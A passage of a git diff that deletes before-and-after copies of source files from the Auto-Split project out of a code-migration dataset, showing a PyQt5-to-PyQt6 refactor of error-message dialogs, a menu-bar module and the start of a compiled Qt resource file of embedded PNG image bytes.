QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Your split image folder contains an image filename with a pause flag {p}, but no pause hotkey is set.") -- msgBox.exec_() -+ setTextMessage("Your split image folder contains an image filename with a pause flag {p}, but no pause hotkey is set.") -+ - - def customThresholdError(self, image): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("\"" + image + "\" doesn't have a valid custom threshold.") -- msgBox.exec_() -+ setTextMessage("\"" + image + "\" doesn't have a valid custom threshold.") - - - def customPauseError(self, image): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("\"" + image + "\" doesn't have a valid custom pause time.") -- msgBox.exec_() -+ setTextMessage("\"" + image + "\" doesn't have a valid custom pause time.") - - - def alphaChannelError(self, image): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("\"" + image + "\" is marked with mask flag but it doesn't have transparency.") -- msgBox.exec_() -+ setTextMessage("\"" + image + "\" is marked with mask flag but it doesn't have transparency.") - - - def alignRegionImageTypeError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("File not a valid image file") -- msgBox.exec_() -+ setTextMessage("File not a valid image file") - - - def alignmentNotMatchedError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("No area in capture region matched reference image. Alignment failed.") -- msgBox.exec_() -+ setTextMessage("No area in capture region matched reference image. Alignment failed.") - - - def multipleResetImagesError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Only one image with the keyword \"reset\" is allowed.") -- msgBox.exec_() -+ setTextMessage("Only one image with the keyword \"reset\" is allowed.") - - - def noResetImageThresholdError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Reset Image must have a custom threshold. Please set one and check that it is valid") -- msgBox.exec_() -+ setTextMessage("Reset Image must have a custom threshold. Please set one and check that it is valid") - - - def resetHotkeyError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Your split image folder contains a reset image, but no reset hotkey is set.") -- msgBox.exec_() -+ setTextMessage("Your split image folder contains a reset image, but no reset hotkey is set.") - - - def dummySplitsError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText( -- "Group dummy splits when undoing/skipping cannot be checked if any split image has a loop parameter greater than 1") -- msgBox.exec_() -+ setTextMessage("Group dummy splits when undoing/skipping cannot be checked if any split image has a loop parameter greater than 1") -+ - - def settingsNotFoundError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("No settings file found. The settings file is saved when the program is closed.") -- msgBox.exec_() -+ setTextMessage("No settings file found. The settings file is saved when the program is closed.") -+ - - def oldVersionSettingsFileError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Old version settings file detected. This version allows settings files from v1.3 and above.") -- msgBox.exec_() -+ setTextMessage("Old version settings file detected. This version allows settings files from v1.3 and above.") -+ - - def invalidSettingsError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Invalid settings file.") -- msgBox.exec_() -+ setTextMessage("Invalid settings file.") -+ - - def noSettingsFileOnOpenError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("No settings file found. One can be loaded on open if placed in the same folder as AutoSplit.exe") -- msgBox.exec_() -+ setTextMessage("No settings file found. One can be loaded on open if placed in the same folder as AutoSplit.exe") -+ - - def tooManySettingsFilesOnOpenError(self): -- msgBox = QtWidgets.QMessageBox() -- msgBox.setWindowTitle('Error') -- msgBox.setText("Too many settings files found. Only one can be loaded on open if placed in the same folder as AutoSplit.exe") -- msgBox.exec_() -+ setTextMessage("Too many settings files found. Only one can be loaded on open if placed in the same folder as AutoSplit.exe") diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.source.py deleted file mode 100644 index f6cb1ed..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.source.py +++ /dev/null @@ -1,142 +0,0 @@ -# Error messages -from PyQt5 import QtWidgets - -def splitImageDirectoryError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("No split image folder is selected.") - msgBox.exec_() - -def splitImageDirectoryNotFoundError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("The Split Image Folder does not exist.") - msgBox.exec_() - - -def imageTypeError(self, image): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText( - '"' + image + '" is not a valid image file or the full image file path contains a special character.') - msgBox.exec_() - - -def regionError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("No region is selected or the Capture Region window is not open. Select a region or load settings while the Capture Region window is open.") - msgBox.exec_() - - -def regionSizeError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Width and height cannot be 0. Please select a larger region.") - msgBox.exec_() - - -def splitHotkeyError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("No split hotkey has been set.") - msgBox.exec_() - -def pauseHotkeyError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Your split image folder contains an image filename with a pause flag {p}, but no pause hotkey is set.") - msgBox.exec_() - -def customThresholdError(self, image): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("\"" + image + "\" doesn't have a valid custom threshold.") - msgBox.exec_() - - -def customPauseError(self, image): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("\"" + image + "\" doesn't have a valid custom pause time.") - msgBox.exec_() - - -def alphaChannelError(self, image): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("\"" + image + "\" is marked with mask flag but it doesn't have transparency.") - msgBox.exec_() - - -def alignRegionImageTypeError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("File not a valid image file") - msgBox.exec_() - - -def alignmentNotMatchedError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("No area in capture region matched reference image. Alignment failed.") - msgBox.exec_() - - -def multipleResetImagesError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Only one image with the keyword \"reset\" is allowed.") - msgBox.exec_() - - -def noResetImageThresholdError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Reset Image must have a custom threshold. Please set one and check that it is valid") - msgBox.exec_() - - -def resetHotkeyError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Your split image folder contains a reset image, but no reset hotkey is set.") - msgBox.exec_() - - -def dummySplitsError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText( - "Group dummy splits when undoing/skipping cannot be checked if any split image has a loop parameter greater than 1") - msgBox.exec_() - -def settingsNotFoundError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("No settings file found. The settings file is saved when the program is closed.") - msgBox.exec_() - -def oldVersionSettingsFileError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Old version settings file detected. This version allows settings files from v1.3 and above.") - msgBox.exec_() - -def invalidSettingsError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Invalid settings file.") - msgBox.exec_() - -def noSettingsFileOnOpenError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("No settings file found. One can be loaded on open if placed in the same folder as AutoSplit.exe") - msgBox.exec_() - -def tooManySettingsFilesOnOpenError(self): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText("Too many settings files found. Only one can be loaded on open if placed in the same folder as AutoSplit.exe") - msgBox.exec_() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.target.py deleted file mode 100644 index 8a325bb..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$error_messages.py.target.py +++ /dev/null @@ -1,93 +0,0 @@ -# Error messages -from PyQt6 import QtWidgets - - -def setTextMessage(message: str): - msgBox = QtWidgets.QMessageBox() - msgBox.setWindowTitle('Error') - msgBox.setText(message) - msgBox.exec() - - -def splitImageDirectoryError(self): - setTextMessage("No split image folder is selected.") - - -def splitImageDirectoryNotFoundError(self): - setTextMessage("The Split Image Folder does not exist.") - - -def imageTypeError(self, image): - setTextMessage('"' + image + '" is not a valid image file or the full image file path contains a special character.') - - -def regionError(self): - setTextMessage("No region is selected or the Capture Region window is not open. Select a region or load settings while the Capture Region window is open.") - - -def regionSizeError(self): - setTextMessage("Width and height cannot be 0. Please select a larger region.") - - -def splitHotkeyError(self): - setTextMessage("No split hotkey has been set.") - - -def pauseHotkeyError(self): - setTextMessage("Your split image folder contains an image filename with a pause flag {p}, but no pause hotkey is set.") - - -def customThresholdError(self, image): - setTextMessage("\"" + image + "\" doesn't have a valid custom threshold.") - - -def customPauseError(self, image): - setTextMessage("\"" + image + "\" doesn't have a valid custom pause time.") - - -def alphaChannelError(self, image): - setTextMessage("\"" + image + "\" is marked with mask flag but it doesn't have transparency.") - - -def alignRegionImageTypeError(self): - setTextMessage("File not a valid image file") - - -def alignmentNotMatchedError(self): - setTextMessage("No area in capture region matched reference image. Alignment failed.") - - -def multipleResetImagesError(self): - setTextMessage("Only one image with the keyword \"reset\" is allowed.") - - -def noResetImageThresholdError(self): - setTextMessage("Reset Image must have a custom threshold. Please set one and check that it is valid") - - -def resetHotkeyError(self): - setTextMessage("Your split image folder contains a reset image, but no reset hotkey is set.") - - -def dummySplitsError(self): - setTextMessage("Group dummy splits when undoing/skipping cannot be checked if any split image has a loop parameter greater than 1") - - -def settingsNotFoundError(self): - setTextMessage("No settings file found. The settings file is saved when the program is closed.") - - -def oldVersionSettingsFileError(self): - setTextMessage("Old version settings file detected. This version allows settings files from v1.3 and above.") - - -def invalidSettingsError(self): - setTextMessage("Invalid settings file.") - - -def noSettingsFileOnOpenError(self): - setTextMessage("No settings file found. One can be loaded on open if placed in the same folder as AutoSplit.exe") - - -def tooManySettingsFilesOnOpenError(self): - setTextMessage("Too many settings files found. Only one can be loaded on open if placed in the same folder as AutoSplit.exe") diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.diff deleted file mode 100644 index aae96b2..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.diff +++ /dev/null @@ -1,11 +0,0 @@ -diff --git a/src/menu_bar.py b/src/menu_bar.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/menu_bar.py - +++ b/src/menu_bar.py -@@ -1,5 +1,5 @@ - import os --from PyQt5 import QtWidgets -+from PyQt6 import QtWidgets - import about - - # About Window diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.source.py deleted file mode 100644 index c65e7d5..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.source.py +++ /dev/null @@ -1,20 +0,0 @@ -import os -from PyQt5 import QtWidgets -import about - -# About Window -class AboutWidget(QtWidgets.QWidget, about.Ui_aboutAutoSplitWidget): - def __init__(self): - super(AboutWidget, self).__init__() - self.setupUi(self) - self.createdbyLabel.setOpenExternalLinks(True) - self.donatebuttonLabel.setOpenExternalLinks(True) - self.show() - -def viewHelp(self): - os.system("start \"\" https://github.com/Toufool/Auto-Split#tutorial") - return - - -def about(self): - self.AboutWidget = AboutWidget() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.target.py deleted file mode 100644 index 3c2b30a..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$menu_bar.py.target.py +++ /dev/null @@ -1,20 +0,0 @@ -import os -from PyQt6 import QtWidgets -import about - -# About Window -class AboutWidget(QtWidgets.QWidget, about.Ui_aboutAutoSplitWidget): - def __init__(self): - super(AboutWidget, self).__init__() - self.setupUi(self) - self.createdbyLabel.setOpenExternalLinks(True) - self.donatebuttonLabel.setOpenExternalLinks(True) - self.show() - -def viewHelp(self): - os.system("start \"\" https://github.com/Toufool/Auto-Split#tutorial") - return - - -def about(self): - self.AboutWidget = AboutWidget() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.diff deleted file mode 100644 index 72c3600..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.diff +++ /dev/null @@ -1,21 +0,0 @@ -diff --git a/src/resources_rc.py b/src/resources_rc.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/resources_rc.py - +++ b/src/resources_rc.py -@@ -1,12 +1,9 @@ --# -*- coding: utf-8 -*- -- --# Resource object code --# --# Created by: The Resource Compiler for PyQt5 (Qt v4.8.7) --# -+# Resource object code (Python 3) -+# Created by: object code -+# Created by: The Resource Compiler for Qt version 6.1.2 - # WARNING! All changes made in this file will be lost! - --from PyQt5 import QtCore -+from PySide6 import QtCore - - qt_resource_data = b"\ - \x00\x00\x3b\x7f\ diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.source.py deleted file mode 100644 index 2abb2a5..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.source.py +++ /dev/null @@ -1,3092 +0,0 @@ -# -*- coding: utf-8 -*- - -# Resource object code -# -# Created by: The Resource Compiler for PyQt5 (Qt v4.8.7) -# -# WARNING! All changes made in this file will be lost! - -from PyQt5 import QtCore - -qt_resource_data = b"\ -\x00\x00\x3b\x7f\ -\x89\ -\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\ -\x00\x00\xaa\x00\x00\x00\x51\x08\x06\x00\x00\x00\x42\x23\x3d\x58\ -\x00\x00\x00\x01\x73\x52\x47\x42\x00\xae\xce\x1c\xe9\x00\x00\x00\ -\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\x00\x00\x00\ -\x09\x70\x48\x59\x73\x00\x00\x0e\xc3\x00\x00\x0e\xc3\x01\xc7\x6f\ -\xa8\x64\x00\x00\x00\x1a\x74\x45\x58\x74\x53\x6f\x66\x74\x77\x61\ -\x72\x65\x00\x50\x61\x69\x6e\x74\x2e\x4e\x45\x54\x20\x76\x33\x2e\ -\x35\x2e\x31\x31\x47\xf3\x42\x37\x00\x00\x3a\xee\x49\x44\x41\x54\ -\x78\x5e\xed\x9d\x07\x58\x54\xc7\xfa\xc6\xaf\x08\x48\xb7\xd7\x98\ -\xd8\x3b\x8a\xbd\x25\x31\xd1\x68\x62\xef\xe9\x76\xa5\x28\x2a\x8a\ -\x25\xb1\xc4\x24\xc6\xc4\x2e\x02\x8a\xd8\x7b\x62\x49\xec\x5d\xec\ -\xdd\xd8\xa5\x48\x11\xc5\x4e\xef\xb0\xc0\xee\x79\xff\xef\xcc\xee\ -\x52\x96\x45\x89\xc9\xbd\xe6\xff\x3c\x4c\x9e\xdf\x9d\x39\x33\xdf\ -\xcc\x99\x73\xe6\x9d\x6f\x66\x76\x57\xee\x7f\x8a\x42\x51\x28\x0a\ -\x45\xa1\x28\x14\x85\xa2\x50\x14\x8a\x42\x51\x28\x0a\x45\xa1\x28\ -\xbc\x81\x90\xb5\xae\xa3\xa5\xb2\xe1\xa3\x32\xca\x7e\x97\xcd\x59\ -\x1b\xbb\x6d\x56\x96\x54\xdf\xac\x78\xd6\xd9\x0c\x8f\xda\x9b\xe1\ -\x49\x96\xbe\x26\x9e\xb5\x48\xcd\xbc\x18\xb3\xcb\x07\xeb\x2d\x15\ -\xb6\xb9\x11\x79\x85\xb1\x33\xb4\x31\x86\x91\x7a\x86\xfd\x2c\x74\ -\x5f\x49\xbe\xba\xc6\xfa\xfa\xba\xb0\x2d\xc3\xf6\x8d\xbe\x8b\x7f\ -\x0e\x45\xf7\x7e\x94\xa5\x75\x36\x2b\xab\xda\x6e\xd6\xec\x1d\xb5\ -\x19\xfb\x5d\x9a\x2a\xab\xdb\x5b\x2b\x9b\xbb\xeb\x54\xf3\x3f\x0c\ -\x58\xf3\x6e\x57\x76\xcc\x5d\xb3\xa2\xf9\x0b\x65\x69\x4d\xb0\x83\ -\xc0\xd2\x1a\x50\xbc\xea\x40\x23\xae\x3d\xc5\x75\x6d\xc6\xc6\x10\ -\xe5\xb9\xa9\x45\x0c\x6d\x44\x9e\x21\x06\x36\x6c\x5f\xdc\x23\x3f\ -\xe2\xde\xb9\x29\x8c\x4d\x41\xd4\x34\x40\xe4\x19\x6b\xef\xff\x0b\ -\xf9\x9f\xa9\x50\xef\xba\x90\x70\xa2\xc9\x71\xd1\xea\x81\x6d\x33\ -\x56\xa8\x0b\xac\x68\x06\x78\xd5\xff\x46\xe3\xdb\x6e\xa8\x4e\x42\ -\xff\xbd\x80\xcd\x9d\x4d\xb0\xaa\x6d\x27\x2c\x6b\x74\x5a\xf1\xac\ -\x9f\x08\x9f\xc6\x50\x36\x76\x04\xf6\x0f\x87\x72\x79\x0e\x94\x9b\ -\x5e\x50\x07\xac\x07\x02\xd6\x92\xf5\x50\x02\xd6\x00\xfe\x1b\xf2\ -\x12\x20\x10\x36\xb9\x59\xf7\x2f\x46\x3c\x8b\x21\xc6\xec\x0c\x31\ -\x56\xcf\x18\xaf\x5b\xaf\x10\xf8\x17\x16\x31\x4e\xc6\x58\xfd\x0a\ -\x8c\xd4\xb9\xcb\x7c\xa2\xdc\x5d\x05\xcd\x2d\x6f\xea\xe2\x27\x28\ -\x47\x5c\xa0\x6c\xee\x02\x8d\x2f\xf5\xe2\x55\x2f\x43\xf1\xae\x17\ -\x02\x9f\xa6\x1f\x63\x43\xc7\x92\x3a\x69\xfd\x73\x41\xd9\xd4\xd1\ -\x8e\x9e\xd3\x5d\x59\xd6\x08\x8a\x8f\x3d\x94\xbd\x5f\x41\xb9\xee\ -\x09\x84\x6c\x87\x3a\x62\x3f\x10\xb1\x0f\x8a\x0e\x0d\xaf\x95\x47\ -\x44\x97\x9f\x1f\x91\xff\x1a\x3c\x64\xdd\x87\x7b\xf3\x62\xac\x7d\ -\x69\xf7\x4f\x61\x70\xbf\xc2\xf2\x60\x8f\x11\x44\x7e\x6e\x8c\xd9\ -\x08\x72\x97\xed\xce\x95\xfe\xab\x88\xba\x86\xec\x82\x12\x6e\xc8\ -\xee\x7c\x20\xfc\x8f\x42\xb2\x2b\x0f\xb2\x3d\x79\x0f\xd1\x8e\x48\ -\xff\x01\x0d\xed\x94\x90\xad\x50\x6e\x2d\x85\x72\xd8\x11\xca\xca\ -\xe6\x50\xbc\x1b\xd0\x03\xd7\xd9\xa8\xac\x7f\xbf\xb4\xb2\x6d\x80\ -\x4e\x65\x7f\x33\x60\x4d\x87\x16\xca\xca\x96\xcf\x15\x0f\xba\xf6\ -\x1d\xbd\x81\x3b\xbe\x14\x84\x10\x0f\x5f\xa8\x1c\x18\xed\xa0\x2a\ -\x4c\x6b\x64\x1e\x1f\x54\xe4\x89\x17\x9e\x7b\xf0\x5e\x85\x7c\xb9\ -\x22\xd6\x91\xcf\x86\xe5\xb9\x11\xf6\xe1\xcc\xcf\x4d\x81\x03\x64\ -\x80\x1c\x0c\x03\x0a\x63\x53\x68\xf2\x0e\xa0\x71\x38\x80\x05\xf2\ -\xbb\x8e\x9d\xb9\xd2\x05\x03\xc1\xfd\xc2\xb0\x93\xb6\x79\xd1\xde\ -\x23\x2f\xd2\xee\xfe\x0e\x5d\x9c\x1b\x91\xa7\x67\xbb\x11\x74\xf9\ -\x61\xdb\xb2\xd3\x8a\x48\x13\x45\xa6\x49\x20\x3d\xee\xae\x2f\xa0\ -\xf1\xae\x0f\xc5\xb7\x19\x94\x35\xed\x7a\xe9\xa4\xf6\xfa\x01\x2b\ -\x9b\x3b\xc0\xb3\x5e\xac\xe2\xd3\x08\x38\x32\x06\x1a\x76\x56\x31\ -\x1c\x50\x3d\x85\x1c\x30\xc3\x41\x91\xf9\x9c\x85\xe0\xec\xd3\x5e\ -\xff\x0d\xee\x0b\x8c\x0d\x50\x5e\x8c\x0e\x76\xbe\x41\x29\x88\xdc\ -\x83\xa5\x45\x31\x24\xac\x30\x70\xd0\xc4\xe0\xe5\x43\x0c\x6a\x0e\ -\x72\xd0\x5f\x9b\xdf\x0a\x81\x91\x7a\xa1\x39\xe5\x0a\xd1\x84\xfd\ -\xaa\xcd\x0b\x65\x1c\xb6\x35\x87\xd0\xd7\x43\x09\xd9\x08\xe5\xec\ -\x64\x28\xdc\xbb\xf2\x5c\x93\xac\xac\x68\xf2\xb5\x4e\x72\x7f\x3d\ -\xa8\x7f\xeb\x59\x57\x59\xd9\xe2\x21\xbc\x1b\x42\x73\x62\x12\x3b\ -\x2c\x44\x9a\x6b\x60\xc5\xcc\xcb\x85\xc2\x41\x7c\x5d\xa4\x00\x64\ -\x1b\x1c\x40\x92\x77\x96\xea\x31\x14\x48\x7e\x1b\x31\xd0\x1a\x0a\ -\x20\x37\x42\x10\xc8\x87\x91\xc1\x29\xb4\x5d\xce\x20\x1a\x43\xd1\ -\x0f\xa8\x21\x46\x6c\x8d\xa1\xd0\xd6\x10\x8d\x01\xc6\x06\xff\x75\ -\x51\x42\xb7\x50\x38\x79\x81\x8c\x37\x33\xde\x2c\xe3\x1c\x36\x11\ -\x8a\x4c\x07\x82\xff\x1a\x39\x75\x37\x40\x09\xe6\x79\xe5\xc2\x6c\ -\xed\x56\x72\xb9\x7d\x82\xf2\x6b\xd7\xae\x3a\xe9\xfd\xb5\xc0\x53\ -\xfc\x4f\xf2\x04\xe8\x37\x51\x27\x20\x31\xf0\x62\x86\x89\xc1\x67\ -\x7c\x3f\x2f\xc6\x5e\xba\x76\x16\xbe\x0a\x0e\x06\x67\xac\xd6\x9b\ -\xe4\xf6\x78\x79\x3d\x6f\x3e\xe8\x3d\x8d\xa1\xf5\xaa\x39\xc8\xfc\ -\x7c\x75\x73\xbc\x6b\xb6\x97\x15\xe8\x26\x61\x81\x18\xd4\x29\x88\ -\x42\xb5\x65\x0c\x83\x76\xfe\x0a\x46\xdb\xfb\x5b\x70\x3c\x42\x29\ -\xce\x60\x1e\x8c\x83\x79\xe8\xba\xc7\xc3\x5e\x3e\x44\x3e\x0f\x51\ -\x7f\x89\xb5\xd0\xb0\xae\xb6\xdd\x0d\xd0\x9c\xfd\x06\xca\x32\x7b\ -\xf1\x69\xd1\x7e\x8d\x67\x6d\x13\x9d\xfc\x0a\x17\xb0\xfa\xfd\xa1\ -\xf0\xae\x97\xa9\xd9\xd9\x97\x9d\xd5\x8b\x91\x4b\x51\x18\x67\x9b\ -\x98\x89\x72\xd6\x69\x67\x9c\x96\x4d\xaf\x8f\x98\x69\x02\x31\xb3\ -\x29\x6e\x29\x5a\x19\x17\x82\x42\x2e\x93\x85\xb5\xcb\x0f\x27\x52\ -\xa1\xc8\x65\xaf\x9f\x80\xf9\x6c\x5e\x8d\xb1\x67\x94\xed\x86\xe6\ -\xc5\xb8\x9d\x31\x44\x9f\x5e\x07\xd1\x26\xc7\x21\x98\x82\x0a\x5c\ -\x05\x25\x68\x25\x10\x50\x00\x81\x3c\xb3\x04\xae\xd0\x21\xd2\x06\ -\x04\x68\x63\x45\xb2\x52\x82\x7b\xa2\xcd\x35\x50\x28\x5a\x45\x88\ -\xf6\xd0\x48\x0a\xb5\x0e\xb0\xba\xcd\x62\x9d\x04\x5f\x1d\xb0\xa2\ -\x71\x71\x78\xd7\xbf\x8b\x95\xad\xa0\xdc\xf4\x64\x87\xb9\x3c\x88\ -\x8e\x8b\x25\x47\x88\x32\x54\x08\x4c\xef\xce\xd7\xe7\x82\xb3\xab\ -\xc0\x99\xf7\x2a\x58\x4f\xb4\x29\x26\x00\x67\x71\xde\x49\xf0\x32\ -\xb4\xcb\x54\x36\xc2\x03\xe8\x26\x92\x86\xc2\xd7\xf6\x55\x94\x89\ -\x7c\x71\x2d\x96\x34\x31\x29\xc4\x12\xc6\xfa\xf2\x5a\x2c\x81\xc2\ -\xce\x48\x7b\x7f\x99\x02\xfa\x65\x0c\xfd\x73\x8a\x58\xf4\x47\xf6\ -\x5d\x57\x57\xa4\xf5\x6d\xe9\xf3\xfe\x32\xda\x36\x5e\x1b\x71\x5f\ -\x21\x26\xff\xe5\x50\x02\x96\x03\x8c\x5f\x85\xb0\x33\x24\xa7\xdc\ -\x87\xd7\x2b\x08\x05\x1b\xc4\xf8\x1e\x45\xcb\xf6\xa5\x87\xbd\xeb\ -\x0d\x6c\xfa\x10\xf0\xaa\xfb\x08\xcb\x1b\xd5\xd5\x49\xf1\xe5\x41\ -\x59\xdb\xae\xbf\x46\x7c\x50\x7b\xc8\x91\x4b\x8a\x98\xbd\xda\x3d\ -\x91\x12\x2c\x1e\x40\x88\x93\x7b\x0b\xbd\xb8\xc4\x8d\x82\x56\x33\ -\xad\x43\xa4\x25\x22\x9f\x0f\x29\x66\x63\x3e\xb4\xb3\x2a\x7b\x76\ -\x89\x3c\xce\x58\xed\xec\xca\x2d\x7c\xde\xe3\x55\xe4\x13\x3c\x97\ -\x13\xc6\xca\x3d\xd1\x47\xb6\xc7\x76\xa4\xb7\x96\xb0\x4d\xd1\xbe\ -\x2c\xd3\xe7\xf3\x25\x85\xb0\x5e\xf6\x33\xfd\x53\x88\xf6\x0c\x31\ -\xb4\x59\x2f\x97\x40\x29\x28\x3e\x8b\xe8\x9f\x5a\xdf\x67\xb9\x44\ -\x8a\x7d\x1c\xdf\xb7\xec\xb3\x61\xdd\xff\x01\xe2\x7d\x89\x31\xba\ -\xeb\x45\x28\x24\xa3\x78\x19\x50\x40\x9e\xff\x32\x89\x14\xae\xf0\ -\xbc\xf4\xc4\x62\xec\x35\x3a\xbd\x88\x71\x57\xce\x4c\x11\x1f\x59\ -\x41\xb3\xa2\xe9\x1c\x9d\x14\x0b\x0e\x38\x39\xab\xb4\xda\xb7\xb9\ -\x9f\xb2\xc2\x1e\x10\xde\x54\xbf\x71\x97\xb3\x4c\xe7\x41\x85\x40\ -\xc5\x8b\x94\x37\x59\x95\x0b\x8a\x2e\x37\x52\x84\x06\xcb\x40\x01\ -\x28\x01\x3e\xac\xa3\x13\xb8\x1c\x24\xa6\x5f\x13\x85\x7d\x51\x82\ -\x57\x53\x04\xe2\x05\x68\xfb\x26\x66\xae\x7c\x29\x6c\x5b\x9b\x2f\ -\xec\xc4\xd2\xa3\x87\x65\xba\xc9\x95\x17\x91\xff\xdf\x41\x91\xf0\ -\xf9\xc5\x24\xd5\x4d\x56\x6d\x3e\xaf\xe5\xbd\xf5\x79\xb9\xdf\xf1\ -\xff\x18\xe1\x15\x29\x36\xc9\x1d\xea\xe1\xb5\xd0\x0a\x5d\xa1\x50\ -\x35\xd2\xeb\xfa\x40\x23\x3c\xab\x98\x04\xbc\x87\x12\xa4\x9d\x18\ -\x1a\x7f\x4f\xc0\x9b\x42\xf5\xb6\x0f\xc7\x89\x1f\x6b\xea\x24\x69\ -\x3c\xa8\xb7\x76\x6f\xcd\x93\x3e\x34\x2b\xeb\x01\x97\xa7\x49\x81\ -\x6a\x67\xbc\xd8\x4b\xea\xbd\x82\xf0\xa4\xe2\x65\xf3\x26\xe2\x66\ -\x42\x68\x3a\xb4\xc2\xd3\xef\x57\x84\x9b\x2f\x0c\x3a\xa1\x0a\x61\ -\xeb\xda\x2d\x2c\x7a\xaf\xac\x47\x7a\x00\xd9\xde\x6a\x2c\xfa\xe9\ -\x07\x7c\x33\x65\x3a\xbe\x15\x4c\x9e\x89\xe9\x53\xbf\x85\xd7\xdc\ -\x1f\x70\x63\xbf\x07\x12\xaf\x73\x19\xca\x5d\xcf\x70\xdf\x25\xc8\ -\x55\xfe\x57\xd1\x3e\x8b\x01\xd9\xef\x47\x87\xd8\xbb\xc9\x65\x70\ -\x25\x82\x8f\x7b\xc0\xef\xb7\x79\x38\xbd\x7d\x11\x52\x6e\x72\x30\ -\xe5\xbb\x13\x65\x06\x75\xfe\x47\xe8\xc7\x52\x8a\x8b\x42\xd3\x18\ -\x15\x60\xe1\x10\xcb\xba\x46\x8a\x54\xa0\x17\xa9\xb8\x07\xdf\x15\ -\xc7\x5b\x43\x3d\xa9\x85\xcd\xc1\xae\xd0\xf8\x56\x81\xe2\xdd\x08\ -\xca\xa6\x1e\x2e\x3a\x49\x1a\x0f\xca\xd2\xda\xad\xe5\x77\xf5\xab\ -\xab\x41\xb3\xa3\x21\x34\x57\x67\x72\x69\xe4\x12\x44\xf4\x42\x95\ -\x9e\xc8\x98\x50\xa5\x40\x04\xb9\x45\x98\x1f\x4d\x20\x3b\x9b\x0b\ 